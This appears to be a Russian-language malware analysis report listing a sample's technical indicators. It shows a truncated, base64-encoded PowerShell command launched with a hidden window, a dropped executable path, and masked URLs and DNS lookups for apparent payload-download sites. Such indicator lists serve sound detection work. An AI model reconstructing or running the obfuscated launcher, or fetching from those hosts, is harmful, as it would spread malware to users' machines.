Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAHYANABoADkAXwAyAD0AKAAoACcATgBwACcAKwAnAGYAegBtACcAKQArACcAbQBpACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBwAFIATwBmAGkAbABlAFwAbAA3ADAAZwBFAD...
- %HOMEPATH%\l70ge02\kerifx4\lfqgw3.exe
- http://www.ag###stepp.com/ww12/6ZI/
- http://ba##ia.net/baiaseu/m4G4chJ/
- http://www.ba###giotti.it/shop/ymwU6/
- http://bb###egal.com/attachments/AAyd/
- http://me##s.de/title_htm_files/Mb/
- http://co#####rfastfix.co.uk/css/DXj/
- http://co#####rfastfix.co.uk/cgi-sys/suspendedpage.cgi
- http://sa##ntrs.lv/wp-content/uploads/2018/Cc/
- http://www.lb#s.lv/
- DNS ASK ag###stepp.com
- DNS ASK ba##ia.net
- DNS ASK ba###giotti.it
- DNS ASK bb###egal.com
- DNS ASK me##s.de
- DNS ASK co#####rfastfix.co.uk
- DNS ASK sa##ntrs.lv
- DNS ASK lb#s.lv
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAHYANABoADkAXwAyAD0AKAAoACcATgBwACcAKwAnAGYAegBtACcAKQArACcAbQBpACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBwAFIATwBmAGkAbABlAFwAbAA3ADAAZwBFAD...' (со скрытым окном)